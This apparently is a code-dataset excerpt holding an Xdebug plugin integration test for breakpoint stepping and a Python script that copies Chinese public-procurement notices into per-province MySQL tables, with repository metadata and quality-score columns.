| 0.289474
| 0.394737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 88
| 2
| 49
| 44
| 0.95
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b3f16b9175ddbc53aed5519784666123e0d55491
| 6,964
|
py
|
Python
|
tests/integration/test_breakpoint_step.py
|
benjamintemitope/SublimeTextXdebug
|
7b62975aed85f4bc839d908d7a696d1ca2b794d9
|
[
"MIT"
] | 344
|
2015-01-03T01:55:52.000Z
|
2022-01-11T08:52:55.000Z
|
tests/integration/test_breakpoint_step.py
|
benjamintemitope/SublimeTextXdebug
|
7b62975aed85f4bc839d908d7a696d1ca2b794d9
|
[
"MIT"
] | 107
|
2015-01-05T12:46:39.000Z
|
2021-03-25T04:56:16.000Z
|
tests/integration/test_breakpoint_step.py
|
benjamintemitope/SublimeTextXdebug
|
7b62975aed85f4bc839d908d7a696d1ca2b794d9
|
[
"MIT"
] | 82
|
2015-01-10T16:02:50.000Z
|
2022-01-18T19:25:58.000Z
|
import os
try:
from xdebug.unittesting import XdebugDeferrableTestCase
except:
from SublimeTextXdebug.xdebug.unittesting import XdebugDeferrableTestCase
class TestBreakpointStep(XdebugDeferrableTestCase):
breakpoint_step_file = 'breakpoint_step.php'
breakpoint_step_file_local_path = os.path.join(XdebugDeferrableTestCase.local_path, breakpoint_step_file)
def test_step_into(self):
self.set_breakpoint(self.breakpoint_step_file_local_path, 11)
self.run_command('xdebug_session_start')
yield self.window_has_debug_layout
breakpoint_view = self.get_view_by_title('Xdebug Breakpoint')
context_view = self.get_view_by_title('Xdebug Context')
stack_view = self.get_view_by_title('Xdebug Stack')
self.assertViewContains(breakpoint_view, '=> {file_local_path}\n\t|+| 11'.format(file_local_path=self.breakpoint_step_file_local_path))
self.assertViewIsEmpty(context_view)
self.assertViewIsEmpty(stack_view)
self.send_server_request(path=self.breakpoint_step_file)
def context_and_stack_have_content():
return not self.view_is_empty(context_view) and not self.view_is_empty(stack_view)
yield context_and_stack_have_content
self.assertViewContains(context_view, '$greeting = <uninitialized>')
self.assertViewContains(stack_view, '[0] file://{remote_path}/{file}:11, {{main}}()'.format(remote_path=self.remote_path, file=self.breakpoint_step_file))
context_view_contents = self.get_contents_of_view(context_view)
stack_view_contents = self.get_contents_of_view(stack_view)
def context_and_stack_have_different_content():
return self.get_contents_of_view(context_view) != context_view_contents and self.get_contents_of_view(stack_view) != stack_view_contents
self.run_command('xdebug_execute', {'command': 'step_into'})
yield context_and_stack_have_different_content
yield context_and_stack_have_content
self.assertViewContains(context_view, '$greet = <uninitialized>')
self.assertViewContains(context_view, '$name = (string) Stranger')
self.assertViewContains(stack_view, '[0] file://{remote_path}/{file}:4, greet()'.format(remote_path=self.remote_path, file=self.breakpoint_step_file))
context_view_contents = self.get_contents_of_view(context_view)
stack_view_contents = self.get_contents_of_view(stack_view)
def context_and_stack_have_different_content():
return self.get_contents_of_view(context_view) != context_view_contents and self.get_contents_of_view(stack_view) != stack_view_contents
self.run_command('xdebug_execute', {'command': 'step_into'})
yield context_and_stack_have_different_content
yield context_and_stack_have_content
self.assertViewContains(context_view, '$greet = (string) Hi')
self.assertViewContains(context_view, '$name = (string) Stranger')
self.assertViewContains(stack_view, '[0] file://{remote_path}/{file}:5, greet()'.format(remote_path=self.remote_path, file=self.breakpoint_step_file))
def test_step_out(self):
self.set_breakpoint(self.breakpoint_step_file_local_path, 5)
self.run_command('xdebug_session_start')
yield self.window_has_debug_layout
breakpoint_view = self.get_view_by_title('Xdebug Breakpoint')
context_view = self.get_view_by_title('Xdebug Context')
stack_view = self.get_view_by_title('Xdebug Stack')
self.assertViewContains(breakpoint_view, '=> {file_local_path}\n\t|+| 5'.format(file_local_path=self.breakpoint_step_file_local_path))
self.assertViewIsEmpty(context_view)
self.assertViewIsEmpty(stack_view)
self.send_server_request(path=self.breakpoint_step_file)
def context_and_stack_have_content():
return not self.view_is_empty(context_view) and not self.view_is_empty(stack_view)
yield context_and_stack_have_content
self.assertViewContains(context_view, '$greet = (string) Hi')
self.assertViewContains(context_view, '$name = (string) Stranger')
self.assertViewContains(stack_view, '[0] file://{remote_path}/{file}:5, greet()'.format(remote_path=self.remote_path, file=self.breakpoint_step_file))
context_view_contents = self.get_contents_of_view(context_view)
stack_view_contents = self.get_contents_of_view(stack_view)
def context_and_stack_have_different_content():
return self.get_contents_of_view(context_view) != context_view_contents and self.get_contents_of_view(stack_view) != stack_view_contents
self.run_command('xdebug_execute', {'command': 'step_out'})
yield context_and_stack_have_different_content
yield context_and_stack_have_content
self.assertViewContains(context_view, '$greeting = (string) Hello Stranger!')
self.assertViewContains(stack_view, '[0] file://{remote_path}/{file}:12, {{main}}()'.format(remote_path=self.remote_path, file=self.breakpoint_step_file))
def test_step_over(self):
self.set_breakpoint(self.breakpoint_step_file_local_path, 11)
self.run_command('xdebug_session_start')
yield self.window_has_debug_layout
breakpoint_view = self.get_view_by_title('Xdebug Breakpoint')
context_view = self.get_view_by_title('Xdebug Context')
stack_view = self.get_view_by_title('Xdebug Stack')
self.assertViewContains(breakpoint_view, '=> {file_local_path}\n\t|+| 11'.format(file_local_path=self.breakpoint_step_file_local_path))
self.assertViewIsEmpty(context_view)
self.assertViewIsEmpty(stack_view)
self.send_server_request(path=self.breakpoint_step_file)
def context_and_stack_have_content():
return not self.view_is_empty(context_view) and not self.view_is_empty(stack_view)
yield context_and_stack_have_content
self.assertViewContains(context_view, '$greeting = <uninitialized>')
self.assertViewContains(stack_view, '[0] file://{remote_path}/{file}:11, {{main}}()'.format(remote_path=self.remote_path, file=self.breakpoint_step_file))
context_view_contents = self.get_contents_of_view(context_view)
stack_view_contents = self.get_contents_of_view(stack_view)
def context_and_stack_have_different_content():
return self.get_contents_of_view(context_view) != context_view_contents and self.get_contents_of_view(stack_view) != stack_view_contents
self.run_command('xdebug_execute', {'command': 'step_over'})
yield context_and_stack_have_different_content
yield context_and_stack_have_content
self.assertViewContains(context_view, '$greeting = (string) Hello Stranger!')
self.assertViewContains(stack_view, '[0] file://{remote_path}/{file}:12, {{main}}()'.format(remote_path=self.remote_path, file=self.breakpoint_step_file))
| 51.585185
| 162
| 0.747702
| 898
| 6,964
| 5.36637
| 0.082405
| 0.079892
| 0.070969
| 0.070969
| 0.938784
| 0.933181
| 0.927163
| 0.927163
| 0.927163
| 0.927163
| 0
| 0.004752
| 0.153935
| 6,964
| 134
| 163
| 51.970149
| 0.813136
| 0
| 0
| 0.821053
| 0
| 0
| 0.142303
| 0.041068
| 0
| 0
| 0
| 0
| 0.273684
| 1
| 0.105263
| false
| 0
| 0.031579
| 0.073684
| 0.242105
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b606c803ecdab8796c233d6f0b74f5656877113c
| 23,410
|
py
|
Python
|
insertData.py
|
lunious/scggzy
|
250094212a650db583ad38cec9644fdd449afdab
|
[
"Apache-2.0"
] | null | null | null |
insertData.py
|
lunious/scggzy
|
250094212a650db583ad38cec9644fdd449afdab
|
[
"Apache-2.0"
] | null | null | null |
insertData.py
|
lunious/scggzy
|
250094212a650db583ad38cec9644fdd449afdab
|
[
"Apache-2.0"
] | null | null | null |
import time
from qgggzy import settings
import pymysql
import logging
connect = pymysql.connect(
host=settings.MYSQL_HOST,
db=settings.MYSQL_DBNAME,
user=settings.MYSQL_USER,
passwd=settings.MYSQL_PASSWD,
port=settings.MYSQL_PORT,
charset='utf8',
use_unicode=False
)
cursor = connect.cursor()
while True:
print('开始插入数据>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>')
try:
# 公告
cursor.execute(
"insert into bjentrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy where area = '北京' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') and id not in (select entityid from bjentrylist where entity='qgggjy')",
)
cursor.execute(
"insert into tjentrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy where area = '天津' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') and id not in (select entityid from tjentrylist where entity='qgggjy')",
)
cursor.execute(
"insert into hbentrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy where area = '河北' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') and id not in (select entityid from hbentrylist where entity='qgggjy')",
)
cursor.execute(
"insert into sxentrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy where area = '山西' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') and id not in (select entityid from sxentrylist where entity='qgggjy')",
)
cursor.execute(
"insert into nmgentrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy where area = '内蒙古' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') and id not in (select entityid from nmgentrylist where entity='qgggjy')",
)
cursor.execute(
"insert into lnentrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy where area = '辽宁' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') and id not in (select entityid from lnentrylist where entity='qgggjy')",
)
cursor.execute(
"insert into jlentrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy where area = '吉林' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') and id not in (select entityid from jlentrylist where entity='qgggjy')",
)
cursor.execute(
"insert into hljentrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy where area = '黑龙江' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') and id not in (select entityid from hljentrylist where entity='qgggjy')",
)
cursor.execute(
"insert into shentrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy where area = '上海' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') and id not in (select entityid from shentrylist where entity='qgggjy')",
)
cursor.execute(
"insert into jsentrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy where area = '江苏' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') and id not in (select entityid from jsentrylist where entity='qgggjy')",
)
cursor.execute(
"insert into zjentrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy where area = '浙江' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') and id not in (select entityid from zjentrylist where entity='qgggjy')",
)
cursor.execute(
"insert into ahentrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy where area = '安徽' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') and id not in (select entityid from ahentrylist where entity='qgggjy')",
)
cursor.execute(
"insert into fjentrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy where area = '福建' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') and id not in (select entityid from fjentrylist where entity='qgggjy')",
)
cursor.execute(
"insert into jxentrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy where area = '江西' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') and id not in (select entityid from jxentrylist where entity='qgggjy')",
)
cursor.execute(
"insert into sdentrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy where area = '山东' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') and id not in (select entityid from sdentrylist where entity='qgggjy')",
)
cursor.execute(
"insert into hnentrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy where area = '山东' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') and id not in (select entityid from sdentrylist where entity='qgggjy')",
)
cursor.execute(
"insert into hubeientrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy where area = '湖北' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') and id not in (select entityid from hubeientrylist where entity='qgggjy')",
)
cursor.execute(
"insert into hunanentrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy where area = '湖南' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') and id not in (select entityid from hunanentrylist where entity='qgggjy')",
)
cursor.execute(
"insert into gdentrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy where area = '广东' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') and id not in (select entityid from gdentrylist where entity='qgggjy')",
)
cursor.execute(
"insert into gxentrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy where area = '广西' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') and id not in (select entityid from gxentrylist where entity='qgggjy')",
)
cursor.execute(
"insert into hainanentrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy where area = '海南' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') and id not in (select entityid from hainanentrylist where entity='qgggjy')",
)
cursor.execute(
"insert into gzentrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy where area = '贵州' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') and id not in (select entityid from gzentrylist where entity='qgggjy')",
)
cursor.execute(
"insert into ynentrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy where area = '云南' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') and id not in (select entityid from ynentrylist where entity='qgggjy')",
)
cursor.execute(
"insert into xzentrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy where area = '西藏' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') and id not in (select entityid from xzentrylist where entity='qgggjy')",
)
cursor.execute(
"insert into shanxientrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy where area = '陕西' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') and id not in (select entityid from shanxientrylist where entity='qgggjy')",
)
cursor.execute(
"insert into gsentrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy where area = '甘肃' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') and id not in (select entityid from gsentrylist where entity='qgggjy')",
)
cursor.execute(
"insert into qhentrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy where area = '青海' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') and id not in (select entityid from qhentrylist where entity='qgggjy')",
)
cursor.execute(
"insert into nxentrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy where area = '宁夏' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') and id not in (select entityid from nxentrylist where entity='qgggjy')",
)
cursor.execute(
"insert into xjentrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy where area = '新疆' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') and id not in (select entityid from xjentrylist where entity='qgggjy')",
)
cursor.execute(
"insert into btentrylist (entryName,sysTime,deadTime,type,entity,entityid,signstauts,labelExplain,lypt,entrynum,address) select entryName,sysTime,deadTime,type,'qgggjy',id,signStauts,tempLabelName,lypt,entryNum,city from qgggjy where area = '兵团' and entryType in ('采购/资审公告', '招标/资审公告', '交易公告') and id not in (select entityid from btentrylist where entity='qgggjy')",
)
# 公示
cursor.execute(
"insert into bjentryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy where area = '北京' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') and id not in (select entityid from bjentryjglist where entity='qgggjy')"
)
cursor.execute(
"insert into tjentryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy where area = '天津' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') and id not in (select entityid from tjentryjglist where entity='qgggjy')"
)
cursor.execute(
"insert into hbentryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy where area = '河北' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') and id not in (select entityid from hbentryjglist where entity='qgggjy')"
)
cursor.execute(
"insert into ynentryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy where area = '云南' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') and id not in (select entityid from ynentryjglist where entity='qgggjy')"
)
cursor.execute(
"insert into sxentryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy where area = '山西' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') and id not in (select entityid from sxentryjglist where entity='qgggjy')"
)
cursor.execute(
"insert into nmgentryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy where area = '内蒙古' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') and id not in (select entityid from nmgentryjglist where entity='qgggjy')"
)
cursor.execute(
"insert into lnentryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy where area = '辽宁' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') and id not in (select entityid from lnentryjglist where entity='qgggjy')"
)
cursor.execute(
"insert into jlentryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy where area = '吉林' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') and id not in (select entityid from jlentryjglist where entity='qgggjy')"
)
cursor.execute(
"insert into hljentryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy where area = '黑龙江' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') and id not in (select entityid from hljentryjglist where entity='qgggjy')"
)
cursor.execute(
"insert into shentryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy where area = '上海' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') and id not in (select entityid from shentryjglist where entity='qgggjy')"
)
cursor.execute(
"insert into jsentryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy where area = '江苏' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') and id not in (select entityid from jsentryjglist where entity='qgggjy')"
)
cursor.execute(
"insert into zjentryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy where area = '浙江' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') and id not in (select entityid from zjentryjglist where entity='qgggjy')"
)
cursor.execute(
"insert into ahentryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy where area = '安徽' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') and id not in (select entityid from ahentryjglist where entity='qgggjy')"
)
cursor.execute(
"insert into fjentryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy where area = '福建' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') and id not in (select entityid from fjentryjglist where entity='qgggjy')"
)
cursor.execute(
"insert into jxentryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy where area = '江西' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') and id not in (select entityid from jxentryjglist where entity='qgggjy')"
)
cursor.execute(
"insert into sdentryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy where area = '山东' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') and id not in (select entityid from sdentryjglist where entity='qgggjy')"
)
cursor.execute(
"insert into hnentryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy where area = '河南' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') and id not in (select entityid from hnentryjglist where entity='qgggjy')"
)
cursor.execute(
"insert into hubeientryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy where area = '湖北' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') and id not in (select entityid from hubeientryjglist where entity='qgggjy')"
)
cursor.execute(
"insert into hunanentryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy where area = '湖南' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') and id not in (select entityid from hunanentryjglist where entity='qgggjy')"
)
cursor.execute(
"insert into gdentryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy where area = '广东' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') and id not in (select entityid from gdentryjglist where entity='qgggjy')"
)
cursor.execute(
"insert into gxentryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy where area = '广西' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') and id not in (select entityid from gxentryjglist where entity='qgggjy')"
)
cursor.execute(
"insert into hainanentryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy where area = '海南' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') and id not in (select entityid from hainanentryjglist where entity='qgggjy')"
)
cursor.execute(
"insert into gzentryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy where area = '贵州' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') and id not in (select entityid from gzentryjglist where entity='qgggjy')"
)
cursor.execute(
"insert into xzentryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy where area = '西藏' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') and id not in (select entityid from xzentryjglist where entity='qgggjy')"
)
cursor.execute(
"insert into shanxientryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy where area = '陕西' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') and id not in (select entityid from shanxientryjglist where entity='qgggjy')"
)
cursor.execute(
"insert into gsentryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy where area = '甘肃' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') and id not in (select entityid from gsentryjglist where entity='qgggjy')"
)
cursor.execute(
"insert into qhentryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy where area = '青海' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') and id not in (select entityid from qhentryjglist where entity='qgggjy')"
)
cursor.execute(
"insert into nxentryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy where area = '宁夏' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') and id not in (select entityid from nxentryjglist where entity='qgggjy')"
)
cursor.execute(
"insert into xjentryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy where area = '新疆' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') and id not in (select entityid from xjentryjglist where entity='qgggjy')"
)
cursor.execute(
"insert into btentryjglist (entryName,sysTime,type,entity,entityid,lypt,entrynum) select entryName,sysTime,type,'qgggjy',id,lypt,entryNum from qgggjy where area = '兵团' and entryType in ('交易结果公示', '中标公告', '成交公示', '交易结果') and id not in (select entityid from btentryjglist where entity='qgggjy')"
)
connect.commit()
print('数据插入成功>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>')
except Exception as error:
print('数据插入失败>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>')
logging.log(error)
time.sleep(2)
| 111.47619
| 386
| 0.714994
| 2,914
| 23,410
| 5.741935
| 0.055251
| 0.11475
| 0.068133
| 0.082477
| 0.885967
| 0.885967
| 0.885967
| 0.752092
| 0.745039
| 0.745039
| 0
| 0.000101
| 0.155788
| 23,410
| 209
| 387
| 112.009569
| 0.846531
| 0.000214
| 0
| 0.295567
| 0
| 0.295567
| 0.851252
| 0.373857
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.004926
| 0.019704
| 0
| 0.019704
| 0.014778
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
